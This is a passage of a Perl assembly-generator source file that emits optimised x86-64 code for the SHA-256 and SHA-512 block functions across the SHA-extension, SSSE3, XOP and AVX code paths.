movdqa @MSG[3],$TMP
palignr \$4,@MSG[2],$TMP
nop
paddd $TMP,@MSG[0]
sha256msg1 @MSG[2],@MSG[1]
sha256rnds2 $CDGH,$ABEF
movdqa 3*32-0x80($Tbl),$Wi
paddd @MSG[3],$Wi
sha256msg2 @MSG[3],@MSG[0]
sha256rnds2 $ABEF,$CDGH # 12-15
pshufd \$0x0e,$Wi,$Wi
movdqa @MSG[0],$TMP
palignr \$4,@MSG[3],$TMP
nop
paddd $TMP,@MSG[1]
sha256msg1 @MSG[3],@MSG[2]
sha256rnds2 $CDGH,$ABEF
___
for($i=4;$i<16-3;$i++) {
$code.=<<___;
movdqa $i*32-0x80($Tbl),$Wi
paddd @MSG[0],$Wi
sha256msg2 @MSG[0],@MSG[1]
sha256rnds2 $ABEF,$CDGH # 16-19...
pshufd \$0x0e,$Wi,$Wi
movdqa @MSG[1],$TMP
palignr \$4,@MSG[0],$TMP
nop
paddd $TMP,@MSG[2]
sha256msg1 @MSG[0],@MSG[3]
sha256rnds2 $CDGH,$ABEF
___
push(@MSG,shift(@MSG));
}
$code.=<<___;
movdqa 13*32-0x80($Tbl),$Wi
paddd @MSG[0],$Wi
sha256msg2 @MSG[0],@MSG[1]
sha256rnds2 $ABEF,$CDGH # 52-55
pshufd \$0x0e,$Wi,$Wi
movdqa @MSG[1],$TMP
palignr \$4,@MSG[0],$TMP
sha256rnds2 $CDGH,$ABEF
paddd $TMP,@MSG[2]
movdqa 14*32-0x80($Tbl),$Wi
paddd @MSG[1],$Wi
sha256rnds2 $ABEF,$CDGH # 56-59
pshufd \$0x0e,$Wi,$Wi
sha256msg2 @MSG[1],@MSG[2]
movdqa $BSWAP,$TMP
sha256rnds2 $CDGH,$ABEF
movdqa 15*32-0x80($Tbl),$Wi
paddd @MSG[2],$Wi
nop
sha256rnds2 $ABEF,$CDGH # 60-63
pshufd \$0x0e,$Wi,$Wi
dec $num
nop
sha256rnds2 $CDGH,$ABEF
paddd $CDGH_SAVE,$CDGH
paddd $ABEF_SAVE,$ABEF
jnz .Loop_shaext
pshufd \$0xb1,$CDGH,$CDGH # DCHG
pshufd \$0x1b,$ABEF,$TMP # FEBA
pshufd \$0xb1,$ABEF,$ABEF # BAFE
punpckhqdq $CDGH,$ABEF # DCBA
palignr \$8,$TMP,$CDGH # HGFE
movdqu $ABEF,($ctx)
movdqu $CDGH,16($ctx)
___
$code.=<<___ if ($win64);
movaps -8-5*16(%rax),%xmm6
movaps -8-4*16(%rax),%xmm7
movaps -8-3*16(%rax),%xmm8
movaps -8-2*16(%rax),%xmm9
movaps -8-1*16(%rax),%xmm10
mov %rax,%rsp
.Lepilogue_shaext:
___
$code.=<<___;
ret
.size sha256_block_data_order_shaext,.-sha256_block_data_order_shaext
___
}}}
{{{
my $a4=$T1;
my ($a,$b,$c,$d,$e,$f,$g,$h);
sub AUTOLOAD() # thunk [simplified] 32-bit style perlasm
{ my $opcode = $AUTOLOAD; $opcode =~ s/.*:://;
my $arg = pop;
$arg = "\$$arg" if ($arg*1 eq $arg);
$code .= "\t$opcode\t".join(',',$arg,reverse @_)."\n";
}
sub body_00_15 () {
(
'($a,$b,$c,$d,$e,$f,$g,$h)=@ROT;'.
'&ror ($a0,$Sigma1[2]-$Sigma1[1])',
'&mov ($a,$a1)',
'&mov ($a4,$f)',
'&ror ($a1,$Sigma0[2]-$Sigma0[1])',
'&xor ($a0,$e)',
'&xor ($a4,$g)', # f^g
'&ror ($a0,$Sigma1[1]-$Sigma1[0])',
'&xor ($a1,$a)',
'&and ($a4,$e)', # (f^g)&e
'&xor ($a0,$e)',
'&add ($h,$SZ*($i&15)."(%rsp)")', # h+=X[i]+K[i]
'&mov ($a2,$a)',
'&xor ($a4,$g)', # Ch(e,f,g)=((f^g)&e)^g
'&ror ($a1,$Sigma0[1]-$Sigma0[0])',
'&xor ($a2,$b)', # a^b, b^c in next round
'&add ($h,$a4)', # h+=Ch(e,f,g)
'&ror ($a0,$Sigma1[0])', # Sigma1(e)
'&and ($a3,$a2)', # (b^c)&(a^b)
'&xor ($a1,$a)',
'&add ($h,$a0)', # h+=Sigma1(e)
'&xor ($a3,$b)', # Maj(a,b,c)=Ch(a^b,c,b)
'&ror ($a1,$Sigma0[0])', # Sigma0(a)
'&add ($d,$h)', # d+=h
'&add ($h,$a3)', # h+=Maj(a,b,c)
'&mov ($a0,$d)',
'&add ($a1,$h);'. # h+=Sigma0(a)
'($a2,$a3) = ($a3,$a2); unshift(@ROT,pop(@ROT)); $i++;'
);
}
######################################################################
# SSSE3 code path
#
if ($SZ==4) { # SHA256 only
my @X = map("%xmm$_",(0..3));
my ($t0,$t1,$t2,$t3, $t4,$t5) = map("%xmm$_",(4..9));
$code.=<<___;
.type ${func}_ssse3,\@function,3
.align 64
${func}_ssse3:
.Lssse3_shortcut:
push %rbx
push %rbp
push %r12
push %r13
push %r14
push %r15
mov %rsp,%r11 # copy %rsp
shl \$4,%rdx # num*16
sub \$`$framesz+$win64*16*4`,%rsp
lea ($inp,%rdx,$SZ),%rdx # inp+num*16*$SZ
and \$-64,%rsp # align stack frame
mov $ctx,$_ctx # save ctx, 1st arg
	mov	$inp,$_inp		# save inp, 2nd arg
mov %rdx,$_end # save end pointer, "3rd" arg
mov %r11,$_rsp # save copy of %rsp
___
$code.=<<___ if ($win64);
movaps %xmm6,16*$SZ+32(%rsp)
movaps %xmm7,16*$SZ+48(%rsp)
movaps %xmm8,16*$SZ+64(%rsp)
movaps %xmm9,16*$SZ+80(%rsp)
___
$code.=<<___;
.Lprologue_ssse3:
mov $SZ*0($ctx),$A
mov $SZ*1($ctx),$B
mov $SZ*2($ctx),$C
mov $SZ*3($ctx),$D
mov $SZ*4($ctx),$E
mov $SZ*5($ctx),$F
mov $SZ*6($ctx),$G
mov $SZ*7($ctx),$H
___
$code.=<<___;
#movdqa $TABLE+`$SZ*2*$rounds`+32(%rip),$t4
#movdqa $TABLE+`$SZ*2*$rounds`+64(%rip),$t5
jmp .Lloop_ssse3
.align 16
.Lloop_ssse3:
movdqa $TABLE+`$SZ*2*$rounds`(%rip),$t3
movdqu 0x00($inp),@X[0]
movdqu 0x10($inp),@X[1]
movdqu 0x20($inp),@X[2]
pshufb $t3,@X[0]
movdqu 0x30($inp),@X[3]
lea $TABLE(%rip),$Tbl
pshufb $t3,@X[1]
movdqa 0x00($Tbl),$t0
movdqa 0x20($Tbl),$t1
pshufb $t3,@X[2]
paddd @X[0],$t0
movdqa 0x40($Tbl),$t2
pshufb $t3,@X[3]
movdqa 0x60($Tbl),$t3
paddd @X[1],$t1
paddd @X[2],$t2
paddd @X[3],$t3
movdqa $t0,0x00(%rsp)
mov $A,$a1
movdqa $t1,0x10(%rsp)
mov $B,$a3
movdqa $t2,0x20(%rsp)
xor $C,$a3 # magic
movdqa $t3,0x30(%rsp)
mov $E,$a0
jmp .Lssse3_00_47
.align 16
.Lssse3_00_47:
sub \$`-16*2*$SZ`,$Tbl # size optimization
___
sub Xupdate_256_SSSE3 () {
(
'&movdqa ($t0,@X[1]);',
'&movdqa ($t3,@X[3])',
'&palignr ($t0,@X[0],$SZ)', # X[1..4]
'&palignr ($t3,@X[2],$SZ);', # X[9..12]
'&movdqa ($t1,$t0)',
'&movdqa ($t2,$t0);',
'&psrld ($t0,$sigma0[2])',
'&paddd (@X[0],$t3);', # X[0..3] += X[9..12]
'&psrld ($t2,$sigma0[0])',
'&pshufd ($t3,@X[3],0b11111010)',# X[14..15]
'&pslld ($t1,8*$SZ-$sigma0[1]);'.
'&pxor ($t0,$t2)',
'&psrld ($t2,$sigma0[1]-$sigma0[0]);'.
'&pxor ($t0,$t1)',
'&pslld ($t1,$sigma0[1]-$sigma0[0]);'.
'&pxor ($t0,$t2);',
'&movdqa ($t2,$t3)',
'&pxor ($t0,$t1);', # sigma0(X[1..4])
'&psrld ($t3,$sigma1[2])',
'&paddd (@X[0],$t0);', # X[0..3] += sigma0(X[1..4])
'&psrlq ($t2,$sigma1[0])',
'&pxor ($t3,$t2);',
'&psrlq ($t2,$sigma1[1]-$sigma1[0])',
'&pxor ($t3,$t2)',
'&pshufb ($t3,$t4)', # sigma1(X[14..15])
'&paddd (@X[0],$t3)', # X[0..1] += sigma1(X[14..15])
'&pshufd ($t3,@X[0],0b01010000)',# X[16..17]
'&movdqa ($t2,$t3);',
'&psrld ($t3,$sigma1[2])',
'&psrlq ($t2,$sigma1[0])',
'&pxor ($t3,$t2);',
'&psrlq ($t2,$sigma1[1]-$sigma1[0])',
'&pxor ($t3,$t2);',
'&movdqa ($t2,16*2*$j."($Tbl)")',
'&pshufb ($t3,$t5)',
'&paddd (@X[0],$t3)' # X[2..3] += sigma1(X[16..17])
);
}
sub SSSE3_256_00_47 () {
my $j = shift;
my $body = shift;
my @X = @_;
my @insns = (&$body,&$body,&$body,&$body); # 104 instructions
if (0) {
foreach (Xupdate_256_SSSE3()) { # 36 instructions
eval;
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
}
} else { # squeeze extra 4% on Westmere and 19% on Atom
eval(shift(@insns)); #@
&movdqa ($t0,@X[1]);
eval(shift(@insns));
eval(shift(@insns));
&movdqa ($t3,@X[3]);
eval(shift(@insns)); #@
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns)); #@
eval(shift(@insns));
&palignr ($t0,@X[0],$SZ); # X[1..4]
eval(shift(@insns));
eval(shift(@insns));
&palignr ($t3,@X[2],$SZ); # X[9..12]
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns)); #@
&movdqa ($t1,$t0);
eval(shift(@insns));
eval(shift(@insns));
&movdqa ($t2,$t0);
eval(shift(@insns)); #@
eval(shift(@insns));
&psrld ($t0,$sigma0[2]);
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&paddd (@X[0],$t3); # X[0..3] += X[9..12]
eval(shift(@insns)); #@
eval(shift(@insns));
&psrld ($t2,$sigma0[0]);
eval(shift(@insns));
eval(shift(@insns));
	 &pshufd	($t3,@X[3],0b11111010);	# X[14..15]
eval(shift(@insns));
eval(shift(@insns)); #@
&pslld ($t1,8*$SZ-$sigma0[1]);
eval(shift(@insns));
eval(shift(@insns));
&pxor ($t0,$t2);
eval(shift(@insns)); #@
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns)); #@
&psrld ($t2,$sigma0[1]-$sigma0[0]);
eval(shift(@insns));
&pxor ($t0,$t1);
eval(shift(@insns));
eval(shift(@insns));
&pslld ($t1,$sigma0[1]-$sigma0[0]);
eval(shift(@insns));
eval(shift(@insns));
&pxor ($t0,$t2);
eval(shift(@insns));
eval(shift(@insns)); #@
&movdqa ($t2,$t3);
eval(shift(@insns));
eval(shift(@insns));
&pxor ($t0,$t1); # sigma0(X[1..4])
eval(shift(@insns)); #@
eval(shift(@insns));
eval(shift(@insns));
&psrld ($t3,$sigma1[2]);
eval(shift(@insns));
eval(shift(@insns));
&paddd (@X[0],$t0); # X[0..3] += sigma0(X[1..4])
eval(shift(@insns)); #@
eval(shift(@insns));
&psrlq ($t2,$sigma1[0]);
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&pxor ($t3,$t2);
eval(shift(@insns)); #@
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns)); #@
&psrlq ($t2,$sigma1[1]-$sigma1[0]);
eval(shift(@insns));
eval(shift(@insns));
&pxor ($t3,$t2);
eval(shift(@insns)); #@
eval(shift(@insns));
eval(shift(@insns));
#&pshufb ($t3,$t4); # sigma1(X[14..15])
&pshufd ($t3,$t3,0b10000000);
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&psrldq ($t3,8);
eval(shift(@insns));
eval(shift(@insns)); #@
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns)); #@
&paddd (@X[0],$t3); # X[0..1] += sigma1(X[14..15])
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&pshufd ($t3,@X[0],0b01010000); # X[16..17]
eval(shift(@insns));
eval(shift(@insns)); #@
eval(shift(@insns));
&movdqa ($t2,$t3);
eval(shift(@insns));
eval(shift(@insns));
&psrld ($t3,$sigma1[2]);
eval(shift(@insns));
eval(shift(@insns)); #@
&psrlq ($t2,$sigma1[0]);
eval(shift(@insns));
eval(shift(@insns));
&pxor ($t3,$t2);
eval(shift(@insns)); #@
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns)); #@
eval(shift(@insns));
&psrlq ($t2,$sigma1[1]-$sigma1[0]);
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&pxor ($t3,$t2);
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns)); #@
#&pshufb ($t3,$t5);
&pshufd ($t3,$t3,0b00001000);
eval(shift(@insns));
eval(shift(@insns));
&movdqa ($t2,16*2*$j."($Tbl)");
eval(shift(@insns)); #@
eval(shift(@insns));
&pslldq ($t3,8);
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&paddd (@X[0],$t3); # X[2..3] += sigma1(X[16..17])
eval(shift(@insns)); #@
eval(shift(@insns));
eval(shift(@insns));
}
&paddd ($t2,@X[0]);
foreach (@insns) { eval; } # remaining instructions
&movdqa (16*$j."(%rsp)",$t2);
}
for ($i=0,$j=0; $j<4; $j++) {
&SSSE3_256_00_47($j,\&body_00_15,@X);
push(@X,shift(@X)); # rotate(@X)
}
&cmpb ($SZ-1+16*2*$SZ."($Tbl)",0);
&jne (".Lssse3_00_47");
for ($i=0; $i<16; ) {
foreach(body_00_15()) { eval; }
}
$code.=<<___;
mov $_ctx,$ctx
mov $a1,$A
add $SZ*0($ctx),$A
lea 16*$SZ($inp),$inp
add $SZ*1($ctx),$B
add $SZ*2($ctx),$C
add $SZ*3($ctx),$D
add $SZ*4($ctx),$E
add $SZ*5($ctx),$F
add $SZ*6($ctx),$G
add $SZ*7($ctx),$H
cmp $_end,$inp
mov $A,$SZ*0($ctx)
mov $B,$SZ*1($ctx)
mov $C,$SZ*2($ctx)
mov $D,$SZ*3($ctx)
mov $E,$SZ*4($ctx)
mov $F,$SZ*5($ctx)
mov $G,$SZ*6($ctx)
mov $H,$SZ*7($ctx)
jb .Lloop_ssse3
mov $_rsp,%rsi
___
$code.=<<___ if ($win64);
movaps 16*$SZ+32(%rsp),%xmm6
movaps 16*$SZ+48(%rsp),%xmm7
movaps 16*$SZ+64(%rsp),%xmm8
movaps 16*$SZ+80(%rsp),%xmm9
___
$code.=<<___;
mov (%rsi),%r15
mov 8(%rsi),%r14
mov 16(%rsi),%r13
mov 24(%rsi),%r12
mov 32(%rsi),%rbp
mov 40(%rsi),%rbx
lea 48(%rsi),%rsp
.Lepilogue_ssse3:
ret
.size ${func}_ssse3,.-${func}_ssse3
___
}
if ($avx) {{
######################################################################
# XOP code path
#
if ($SZ==8) { # SHA512 only
$code.=<<___;
.type ${func}_xop,\@function,3
.align 64
${func}_xop:
.Lxop_shortcut:
push %rbx
push %rbp
push %r12
push %r13
push %r14
push %r15
mov %rsp,%r11 # copy %rsp
shl \$4,%rdx # num*16
sub \$`$framesz+$win64*16*($SZ==4?4:6)`,%rsp
lea ($inp,%rdx,$SZ),%rdx # inp+num*16*$SZ
and \$-64,%rsp # align stack frame
mov $ctx,$_ctx # save ctx, 1st arg
	mov	$inp,$_inp		# save inp, 2nd arg
mov %rdx,$_end # save end pointer, "3rd" arg
mov %r11,$_rsp # save copy of %rsp
___
$code.=<<___ if ($win64);
movaps %xmm6,16*$SZ+32(%rsp)
movaps %xmm7,16*$SZ+48(%rsp)
movaps %xmm8,16*$SZ+64(%rsp)
movaps %xmm9,16*$SZ+80(%rsp)
___
$code.=<<___ if ($win64 && $SZ>4);
movaps %xmm10,16*$SZ+96(%rsp)
movaps %xmm11,16*$SZ+112(%rsp)
___
$code.=<<___;
.Lprologue_xop:
vzeroupper
mov $SZ*0($ctx),$A
mov $SZ*1($ctx),$B
mov $SZ*2($ctx),$C
mov $SZ*3($ctx),$D
mov $SZ*4($ctx),$E
mov $SZ*5($ctx),$F
mov $SZ*6($ctx),$G
mov $SZ*7($ctx),$H
jmp .Lloop_xop
___
if ($SZ==4) { # SHA256
my @X = map("%xmm$_",(0..3));
my ($t0,$t1,$t2,$t3) = map("%xmm$_",(4..7));
$code.=<<___;
.align 16
.Lloop_xop:
vmovdqa $TABLE+`$SZ*2*$rounds`(%rip),$t3
vmovdqu 0x00($inp),@X[0]
vmovdqu 0x10($inp),@X[1]
vmovdqu 0x20($inp),@X[2]
vmovdqu 0x30($inp),@X[3]
vpshufb $t3,@X[0],@X[0]
lea $TABLE(%rip),$Tbl
vpshufb $t3,@X[1],@X[1]
vpshufb $t3,@X[2],@X[2]
vpaddd 0x00($Tbl),@X[0],$t0
vpshufb $t3,@X[3],@X[3]
vpaddd 0x20($Tbl),@X[1],$t1
vpaddd 0x40($Tbl),@X[2],$t2
vpaddd 0x60($Tbl),@X[3],$t3
vmovdqa $t0,0x00(%rsp)
mov $A,$a1
vmovdqa $t1,0x10(%rsp)
mov $B,$a3
vmovdqa $t2,0x20(%rsp)
xor $C,$a3 # magic
vmovdqa $t3,0x30(%rsp)
mov $E,$a0
jmp .Lxop_00_47
.align 16
.Lxop_00_47:
sub \$`-16*2*$SZ`,$Tbl # size optimization
___
sub XOP_256_00_47 () {
my $j = shift;
my $body = shift;
my @X = @_;
my @insns = (&$body,&$body,&$body,&$body); # 104 instructions
&vpalignr ($t0,@X[1],@X[0],$SZ); # X[1..4]
eval(shift(@insns));
eval(shift(@insns));
&vpalignr ($t3,@X[3],@X[2],$SZ); # X[9..12]
eval(shift(@insns));
eval(shift(@insns));
&vprotd ($t1,$t0,8*$SZ-$sigma0[1]);
eval(shift(@insns));
eval(shift(@insns));
&vpsrld ($t0,$t0,$sigma0[2]);
eval(shift(@insns));
eval(shift(@insns));
&vpaddd (@X[0],@X[0],$t3); # X[0..3] += X[9..12]
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vprotd ($t2,$t1,$sigma0[1]-$sigma0[0]);
eval(shift(@insns));
eval(shift(@insns));
&vpxor ($t0,$t0,$t1);
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vprotd ($t3,@X[3],8*$SZ-$sigma1[1]);
eval(shift(@insns));
eval(shift(@insns));
&vpxor ($t0,$t0,$t2); # sigma0(X[1..4])
eval(shift(@insns));
eval(shift(@insns));
&vpsrld ($t2,@X[3],$sigma1[2]);
eval(shift(@insns));
eval(shift(@insns));
&vpaddd (@X[0],@X[0],$t0); # X[0..3] += sigma0(X[1..4])
eval(shift(@insns));
eval(shift(@insns));
&vprotd ($t1,$t3,$sigma1[1]-$sigma1[0]);
eval(shift(@insns));
eval(shift(@insns));
&vpxor ($t3,$t3,$t2);
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vpxor ($t3,$t3,$t1); # sigma1(X[14..15])
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vpsrldq ($t3,$t3,8);
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vpaddd (@X[0],@X[0],$t3); # X[0..1] += sigma1(X[14..15])
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vprotd ($t3,@X[0],8*$SZ-$sigma1[1]);
eval(shift(@insns));
eval(shift(@insns));
&vpsrld ($t2,@X[0],$sigma1[2]);
eval(shift(@insns));
eval(shift(@insns));
&vprotd ($t1,$t3,$sigma1[1]-$sigma1[0]);
eval(shift(@insns));
eval(shift(@insns));
&vpxor ($t3,$t3,$t2);
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vpxor ($t3,$t3,$t1); # sigma1(X[16..17])
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vpslldq ($t3,$t3,8); # 22 instructions
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vpaddd (@X[0],@X[0],$t3); # X[2..3] += sigma1(X[16..17])
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vpaddd ($t2,@X[0],16*2*$j."($Tbl)");
foreach (@insns) { eval; } # remaining instructions
&vmovdqa (16*$j."(%rsp)",$t2);
}
for ($i=0,$j=0; $j<4; $j++) {
&XOP_256_00_47($j,\&body_00_15,@X);
push(@X,shift(@X)); # rotate(@X)
}
&cmpb ($SZ-1+16*2*$SZ."($Tbl)",0);
&jne (".Lxop_00_47");
for ($i=0; $i<16; ) {
foreach(body_00_15()) { eval; }
}
} else { # SHA512
my @X = map("%xmm$_",(0..7));
my ($t0,$t1,$t2,$t3) = map("%xmm$_",(8..11));
$code.=<<___;
.align 16
.Lloop_xop:
vmovdqa $TABLE+`$SZ*2*$rounds`(%rip),$t3
vmovdqu 0x00($inp),@X[0]
lea $TABLE+0x80(%rip),$Tbl # size optimization
vmovdqu 0x10($inp),@X[1]
vmovdqu 0x20($inp),@X[2]
vpshufb $t3,@X[0],@X[0]
vmovdqu 0x30($inp),@X[3]
vpshufb $t3,@X[1],@X[1]
vmovdqu 0x40($inp),@X[4]
vpshufb $t3,@X[2],@X[2]
vmovdqu 0x50($inp),@X[5]
vpshufb $t3,@X[3],@X[3]
vmovdqu 0x60($inp),@X[6]
vpshufb $t3,@X[4],@X[4]
vmovdqu 0x70($inp),@X[7]
vpshufb $t3,@X[5],@X[5]
vpaddq -0x80($Tbl),@X[0],$t0
vpshufb $t3,@X[6],@X[6]
vpaddq -0x60($Tbl),@X[1],$t1
vpshufb $t3,@X[7],@X[7]
vpaddq -0x40($Tbl),@X[2],$t2
vpaddq -0x20($Tbl),@X[3],$t3
vmovdqa $t0,0x00(%rsp)
vpaddq 0x00($Tbl),@X[4],$t0
vmovdqa $t1,0x10(%rsp)
vpaddq 0x20($Tbl),@X[5],$t1
vmovdqa $t2,0x20(%rsp)
vpaddq 0x40($Tbl),@X[6],$t2
vmovdqa $t3,0x30(%rsp)
vpaddq 0x60($Tbl),@X[7],$t3
vmovdqa $t0,0x40(%rsp)
mov $A,$a1
vmovdqa $t1,0x50(%rsp)
mov $B,$a3
vmovdqa $t2,0x60(%rsp)
xor $C,$a3 # magic
vmovdqa $t3,0x70(%rsp)
mov $E,$a0
jmp .Lxop_00_47
.align 16
.Lxop_00_47:
add \$`16*2*$SZ`,$Tbl
___
sub XOP_512_00_47 () {
my $j = shift;
my $body = shift;
my @X = @_;
my @insns = (&$body,&$body); # 52 instructions
&vpalignr ($t0,@X[1],@X[0],$SZ); # X[1..2]
eval(shift(@insns));
eval(shift(@insns));
&vpalignr ($t3,@X[5],@X[4],$SZ); # X[9..10]
eval(shift(@insns));
eval(shift(@insns));
&vprotq ($t1,$t0,8*$SZ-$sigma0[1]);
eval(shift(@insns));
eval(shift(@insns));
&vpsrlq ($t0,$t0,$sigma0[2]);
eval(shift(@insns));
eval(shift(@insns));
&vpaddq (@X[0],@X[0],$t3); # X[0..1] += X[9..10]
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vprotq ($t2,$t1,$sigma0[1]-$sigma0[0]);
eval(shift(@insns));
eval(shift(@insns));
&vpxor ($t0,$t0,$t1);
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vprotq ($t3,@X[7],8*$SZ-$sigma1[1]);
eval(shift(@insns));
eval(shift(@insns));
&vpxor ($t0,$t0,$t2); # sigma0(X[1..2])
eval(shift(@insns));
eval(shift(@insns));
&vpsrlq ($t2,@X[7],$sigma1[2]);
eval(shift(@insns));
eval(shift(@insns));
&vpaddq (@X[0],@X[0],$t0); # X[0..1] += sigma0(X[1..2])
eval(shift(@insns));
eval(shift(@insns));
&vprotq ($t1,$t3,$sigma1[1]-$sigma1[0]);
eval(shift(@insns));
eval(shift(@insns));
&vpxor ($t3,$t3,$t2);
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vpxor ($t3,$t3,$t1); # sigma1(X[14..15])
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vpaddq (@X[0],@X[0],$t3); # X[0..1] += sigma1(X[14..15])
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vpaddq ($t2,@X[0],16*2*$j-0x80."($Tbl)");
foreach (@insns) { eval; } # remaining instructions
&vmovdqa (16*$j."(%rsp)",$t2);
}
for ($i=0,$j=0; $j<8; $j++) {
&XOP_512_00_47($j,\&body_00_15,@X);
push(@X,shift(@X)); # rotate(@X)
}
&cmpb ($SZ-1+16*2*$SZ-0x80."($Tbl)",0);
&jne (".Lxop_00_47");
for ($i=0; $i<16; ) {
foreach(body_00_15()) { eval; }
}
}
$code.=<<___;
mov $_ctx,$ctx
mov $a1,$A
add $SZ*0($ctx),$A
lea 16*$SZ($inp),$inp
add $SZ*1($ctx),$B
add $SZ*2($ctx),$C
add $SZ*3($ctx),$D
add $SZ*4($ctx),$E
add $SZ*5($ctx),$F
add $SZ*6($ctx),$G
add $SZ*7($ctx),$H
cmp $_end,$inp
mov $A,$SZ*0($ctx)
mov $B,$SZ*1($ctx)
mov $C,$SZ*2($ctx)
mov $D,$SZ*3($ctx)
mov $E,$SZ*4($ctx)
mov $F,$SZ*5($ctx)
mov $G,$SZ*6($ctx)
mov $H,$SZ*7($ctx)
jb .Lloop_xop
mov $_rsp,%rsi
vzeroupper
___
$code.=<<___ if ($win64);
movaps 16*$SZ+32(%rsp),%xmm6
movaps 16*$SZ+48(%rsp),%xmm7
movaps 16*$SZ+64(%rsp),%xmm8
movaps 16*$SZ+80(%rsp),%xmm9
___
$code.=<<___ if ($win64 && $SZ>4);
movaps 16*$SZ+96(%rsp),%xmm10
movaps 16*$SZ+112(%rsp),%xmm11
___
$code.=<<___;
mov (%rsi),%r15
mov 8(%rsi),%r14
mov 16(%rsi),%r13
mov 24(%rsi),%r12
mov 32(%rsi),%rbp
mov 40(%rsi),%rbx
lea 48(%rsi),%rsp
.Lepilogue_xop:
ret
.size ${func}_xop,.-${func}_xop
___
}
######################################################################
# AVX+shrd code path
#
local *ror = sub { &shrd(@_[0],@_) };
$code.=<<___;
.type ${func}_avx,\@function,3
.align 64
${func}_avx:
.Lavx_shortcut:
push %rbx
push %rbp
push %r12
push %r13
push %r14
push %r15
mov %rsp,%r11 # copy %rsp
shl \$4,%rdx # num*16
sub \$`$framesz+$win64*16*($SZ==4?4:6)`,%rsp
lea ($inp,%rdx,$SZ),%rdx # inp+num*16*$SZ
and \$-64,%rsp # align stack frame
mov $ctx,$_ctx # save ctx, 1st arg
	mov	$inp,$_inp		# save inp, 2nd arg
mov %rdx,$_end # save end pointer, "3rd" arg
mov %r11,$_rsp # save copy of %rsp
___
$code.=<<___ if ($win64);
movaps %xmm6,16*$SZ+32(%rsp)
movaps %xmm7,16*$SZ+48(%rsp)
movaps %xmm8,16*$SZ+64(%rsp)
movaps %xmm9,16*$SZ+80(%rsp)
___
$code.=<<___ if ($win64 && $SZ>4);
movaps %xmm10,16*$SZ+96(%rsp)
movaps %xmm11,16*$SZ+112(%rsp)
___
$code.=<<___;
.Lprologue_avx:
vzeroupper
mov $SZ*0($ctx),$A
mov $SZ*1($ctx),$B
mov $SZ*2($ctx),$C
mov $SZ*3($ctx),$D
mov $SZ*4($ctx),$E
mov $SZ*5($ctx),$F
mov $SZ*6($ctx),$G
mov $SZ*7($ctx),$H
___
if ($SZ==4) { # SHA256
my @X = map("%xmm$_",(0..3));
my ($t0,$t1,$t2,$t3, $t4,$t5) = map("%xmm$_",(4..9));
$code.=<<___;
vmovdqa $TABLE+`$SZ*2*$rounds`+32(%rip),$t4
vmovdqa $TABLE+`$SZ*2*$rounds`+64(%rip),$t5
jmp .Lloop_avx
.align 16
.Lloop_avx:
vmovdqa $TABLE+`$SZ*2*$rounds`(%rip),$t3
vmovdqu 0x00($inp),@X[0]
vmovdqu 0x10($inp),@X[1]
vmovdqu 0x20($inp),@X[2]
vmovdqu 0x30($inp),@X[3]
vpshufb $t3,@X[0],@X[0]
lea $TABLE(%rip),$Tbl
vpshufb $t3,@X[1],@X[1]
vpshufb $t3,@X[2],@X[2]
vpaddd 0x00($Tbl),@X[0],$t0
vpshufb $t3,@X[3],@X[3]
vpaddd 0x20($Tbl),@X[1],$t1
vpaddd 0x40($Tbl),@X[2],$t2
vpaddd 0x60($Tbl),@X[3],$t3
vmovdqa $t0,0x00(%rsp)
mov $A,$a1
vmovdqa $t1,0x10(%rsp)
mov $B,$a3
vmovdqa $t2,0x20(%rsp)
xor $C,$a3 # magic
vmovdqa $t3,0x30(%rsp)
mov $E,$a0
jmp .Lavx_00_47
.align 16
.Lavx_00_47:
sub \$`-16*2*$SZ`,$Tbl # size optimization
___
sub Xupdate_256_AVX () {
(
'&vpalignr ($t0,@X[1],@X[0],$SZ)', # X[1..4]
'&vpalignr ($t3,@X[3],@X[2],$SZ)', # X[9..12]
'&vpsrld ($t2,$t0,$sigma0[0]);',
'&vpaddd (@X[0],@X[0],$t3)', # X[0..3] += X[9..12]
'&vpsrld ($t3,$t0,$sigma0[2])',
'&vpslld ($t1,$t0,8*$SZ-$sigma0[1]);',
'&vpxor ($t0,$t3,$t2)',
'&vpshufd ($t3,@X[3],0b11111010)',# X[14..15]
'&vpsrld ($t2,$t2,$sigma0[1]-$sigma0[0]);',
'&vpxor ($t0,$t0,$t1)',
'&vpslld ($t1,$t1,$sigma0[1]-$sigma0[0]);',
'&vpxor ($t0,$t0,$t2)',
